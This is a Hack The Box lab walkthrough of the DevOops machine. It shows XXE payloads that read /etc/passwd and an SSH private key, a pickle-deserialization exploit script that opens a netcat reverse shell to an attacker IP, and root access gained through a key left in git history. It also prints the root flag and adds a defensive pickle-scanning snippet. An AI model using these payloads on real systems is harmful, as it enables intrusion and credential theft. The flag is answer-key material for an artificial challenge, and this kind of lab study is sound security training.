 2020-03-30   2.1k

HTB::DevOops Walkthrough

0x01 Info Card

0x02 Preliminary

Python unserialize

https://r1dd1er.top/2019/05/21/python安全之反序列化/

http://bendawang.site/2018/03/01/关于Python-sec的一些总结/

https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之Python 反序列化漏洞/

http://www.code2sec.com/python-picklede-ren-yi-dai-ma-zhi-xing-lou-dong-shi-jian-he-payloadgou-zao.html

Practice lab: https://github.com/vulhub/vulhub/tree/master/python/unpickle

XXE Injection

https://ca0y1h.top/Web_security/basic_learning/20.xxe漏洞利用/

0x03 Tools and Tips

  • nmap
  • dirsearch
  • wfuzz
  • Python pickle unserialize
  • XXE read files
  • Git

0x04 Pentesting

Initial Enumeration

nmap scan

# Nmap 7.80 scan initiated Tue Mar 24 09:04:48 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.91
Nmap scan report for 10.10.10.91
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
| 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
|_ 256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
5000/tcp open http Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 24 09:05:52 2020 -- 1 IP address (1 host up) scanned in 64.19 seconds

Port 5000 is served by the Python web server gunicorn. Use dirsearch and wfuzz to brute-force directories:

$ ./dirsearch -u http://10.10.10.91:5000/ -e *
Target: http://10.10.10.91:5000/

[02:21:18] Starting:
[02:24:47] 200 - 533KB - /feed
[02:27:26] 200 - 347B - /upload

Task Completed
$ wfuzz --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.91:5000/FUZZ
...
000000126: 200 1815 L 24122 517022 Ch "feed"
000000366: 200 0 L 39 W 347 Ch "upload"
000019602: 405 4 L 23 W 178 Ch "newpost"

Getting User Flag

Visit the homepage:

<html>
<body>
Under construction!<br>
<p>
This is feed.py, which will become the MVP for Blogfeeder application.
</p>
<p>
TODO: replace this with the proper feed from the dev.solita.fi backend.
</p>
<p>
<img src="/feed" align="center" width="60%" height="60%">
</p>
</body>
</html>

Visit http://10.10.10.91:5000/upload. It expects an uploaded XML file containing Author, Subject and Content elements. First try uploading a normal XML file:

<?xml version="1.0"?>
<body>
  <Author>author</Author>
  <Subject>subject</Subject>
  <Content>content</Content>
</body>

It returns a confirmation together with the file path:

PROCESSED BLOGPOST: Author: author Subject: subject Content: content URL for later reference: /uploads/test.xml File path: /home/roosa/deploy/src

Now I upload a malicious XML file that declares an external entity in order to read local files:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Author [<!ENTITY file SYSTEM "file:///etc/passwd">]>
<Author>
  <Subject>ca01h</Subject>
  <Content>njupt</Content>
  &file;
</Author>

Visiting http://10.10.10.91:5000/uploads/evil.xml returns the contents of /etc/passwd:

PROCESSED BLOGPOST: Author: njupt root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
roosa:x:1002:1002:,,,:/home/roosa:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin blogfeed:x:1003:1003:,,,:/home/blogfeed:/bin/false Subject: ca01h Content: njupt URL for later reference: /uploads/evil.xml File path: /home/roosa/deploy/src

Combining the feed.py hint on the homepage with the path /home/roosa/deploy/src shown after a successful upload, the site's source code is probably in that directory, so next we try to read /home/roosa/deploy/src/feed.py with the same XXE payload:

def uploaded_file(filename):
    return send_from_directory(Config.UPLOAD_FOLDER, filename)

@app.route("/")
def xss():
    return template('index.html')

@app.route("/feed")
def fakefeed():
    return send_from_directory(".","devsolita-snapshot.png")

@app.route("/newpost", methods=["POST"])
def newpost():
    # TODO: proper save to database, this is for testing purposes right now
    picklestr = base64.urlsafe_b64decode(request.data)
    # return picklestr
    postObj = pickle.loads(picklestr)
    return "POST RECEIVED: " + postObj['Subject']

## TODO: VERY important! DISABLED THIS IN PRODUCTION
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')
# TODO: Replace run-gunicorn.sh with real Linux service script
#app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')

if __name__ == "__main__":
    app.run(host='0.0.0,0', Debug=True)

With the Python deserialization background from the preliminary section, it is easy to see that the statement postObj = pickle.loads(picklestr) is a deserialization vulnerability: the request body is base64-decoded and unpickled without any check. Write a Python script that gets a reverse shell through it:

import pickle
import requests
import os
import base64

url = "http://10.10.10.91:5000/newpost"
headers = {"Content-Type": "text/plain"}
# command run on the target when the pickle is loaded: a named-pipe reverse shell to the listener
code = 'rm /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc 10.10.16.99 9000 >/tmp/x'


class Devoops(object):
    # __reduce__ makes pickle rebuild this object by calling os.system(code) on load
    def __reduce__(self):
        return (os.system, (code,))


# serialize and base64-encode exactly the way /newpost decodes request.data
payload = base64.urlsafe_b64encode(pickle.dumps(Devoops()))
print(payload)
r = requests.post(url=url, data=payload, headers=headers, allow_redirects=False)
print(r.text)

The script must be run with Python 2, because the serialized output of Python 2 and Python 3 is completely different.
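As an added example (not code from the original post or from the DevOops box), here is a Python 3 hardening of the /newpost handler's pickle.loads call: an opcode scanner that flags GLOBAL/REDUCE-style opcodes without executing the stream (also usable as a detection check over logged request bodies), a find_class that refuses every global, and a schema check on the result. The sample payloads at the bottom are constructed; SAMPLE_REDUCE would only call builtins.len.

```python
import base64
import io
import pickle
import pickletools

# Opcodes through which a pickle can reach arbitrary callables. None of them
# is needed to represent a plain dict of strings such as a blog post.
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD", "INST",
                 "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def scan_pickle(raw: bytes) -> set:
    """Disassemble raw without executing it; return the dangerous opcode
    names it contains (an empty set means nothing suspicious was seen)."""
    found = set()
    try:
        for opcode, _arg, _pos in pickletools.genops(raw):
            if opcode.name in DANGEROUS_OPS:
                found.add(opcode.name)
    except ValueError:
        found.add("MALFORMED")  # truncated or garbage stream: reject as well
    return found

class NoGlobalsUnpickler(pickle.Unpickler):
    """Second line of defence: refuse to resolve any module.name reference."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))

def load_post(b64data: bytes):
    """Hardened stand-in for pickle.loads(base64.urlsafe_b64decode(data)):
    returns the post dict, or None when the payload is rejected."""
    try:
        raw = base64.urlsafe_b64decode(b64data)
        if scan_pickle(raw):
            return None
        obj = NoGlobalsUnpickler(io.BytesIO(raw)).load()
    except Exception:  # bad base64, forbidden global, malformed stream
        return None
    if not isinstance(obj, dict) or not isinstance(obj.get("Subject"), str):
        return None  # schema check: a post is a dict with a string Subject
    return obj

# Constructed samples: a benign post, and a protocol-0 pickle with the same
# GLOBAL/REDUCE shape as the exploit above (it only references builtins.len).
SAMPLE_BENIGN = base64.urlsafe_b64encode(pickle.dumps({"Subject": "hi", "Author": "x"}))
SAMPLE_REDUCE = base64.urlsafe_b64encode(b"cbuiltins\nlen\n(S'abc'\ntR.")
```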

Listen on the port on the local machine:

$ nc -lvvp 9000
listening on [any] 9000 ...
10.10.10.91: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.91] 44014
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
$ python -c "import pty;pty.spawn('/bin/bash')"
roosa@devoops:~/deploy/src$ id
id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
roosa@devoops:~/deploy/src$ cd && ls -a user.txt
cd && ls -a user.txt
user.txt

There is also a simpler method. With only read access to the target, the article in the reference section points out which files we should look for. In this case we can read the id_rsa file in roosa's home directory:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Author [<!ENTITY file SYSTEM "file:///home/roosa/.ssh/id_rsa">]>
<Author>
  <Subject>ca01h</Subject>
  <Content>njupt</Content>
  &file;
</Author>

Save the key locally and log in to the target with ssh:

# kali @ kali in ~/HackTheBox/DevOops [2:01:04]
$ chmod 600 id_rsa

# kali @ kali in ~/HackTheBox/DevOops [2:01:19]
$ ssh -i id_rsa roosa@10.10.10.91
The authenticity of host '10.10.10.91 (10.10.10.91)' can't be established.
ECDSA key fingerprint is SHA256:hbD2D4PdnIVpAFHV8sSAbtM0IlTAIpYZ/nwspIdp4Vg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.91' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

roosa@devoops:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)

Getting Root Flag

After logging in, look at .bash_history; it contains several revealing git commands:

...
mkdir integration/auth_credentials.key
nano integration/auth_credentials.key/
ls -altr
chmod go-rwx authcredentials.key
...
rm -Rf resources/integration/auth_credentials.key
mv resources/authcredentials.key resources/integration/
git add resources/integration/authcredentials.key
git commit -m 'add key for feed integration from tnerprise backend'
...
ssh-keygen
...
cat kak
cp kak resources/integration/authcredentials.key
git add resources/integration/authcredentials.key
git commit -m 'reverted accidental commit with proper key'

Look at the commit history in the local git repository:

roosa@devoops:~/work/blogfeed$ git log --pretty=oneline
7ff507d029021b0915235ff91e6a74ba33009c6d Use Base64 for pickle feed loading
26ae6c8668995b2f09bf9e2809c36b156207bfa8 Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.
cec54d8cb6117fd7f164db142f0348a74d3e9a70 Debug support added to make development more agile.
ca3e768f2434511e75bd5137593895bd38e1b1c2 Blogfeed app, initial version.
dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94 Gunicorn startup script
33e87c312c08735a02fa9c796021a4a3023129ad reverted accidental commit with proper key
d387abf63e05c9628a59195cec9311751bdb283f add key for feed integration from tnerprise backend
1422e5a04d1b52a44e6dc81023420347e257ee5f Initial commit

Reset the repository to the second commit in the history (d387abf, "add key for feed integration from tnerprise backend"), which still contains the accidentally committed key:

roosa@devoops:~/work/blogfeed/resources/integration$ git reset --hard d387abf63e05c9628a59195cec9311751bdb283f
HEAD is now at d387abf add key for feed integration from tnerprise backend
roosa@devoops:~/work/blogfeed/resources/integration$ ls -la
total 12
drwxrwxr-x 2 roosa roosa 4096 Mar 30 02:42 .
drwxrwxr-x 3 roosa roosa 4096 Mar 30 02:39 ..
-rw-rw-r-- 1 roosa roosa 1676 Mar 30 02:42 authcredentials.key
roosa@devoops:~/work/blogfeed/resources/integration$ cat authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

Copy the key to the local machine and use it to log in to the target with ssh:

$ chmod 600 root_id_rsa

# kali @ kali in ~/HackTheBox/DevOops [2:44:48]
$ ssh -i root_id_rsa root@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
root@devoops:~# id
uid=0(root) gid=0(root) groups=0(root)
root@devoops:~# cat root.txt
d4fe1e7f7187407eebdd3209cb1ac7b3

0x05 Reference

https://epi052.gitlab.io/notes-to-self/blog/2018-10-11-hack-the-box-devoops/

Copyright © ca01h 2019-2020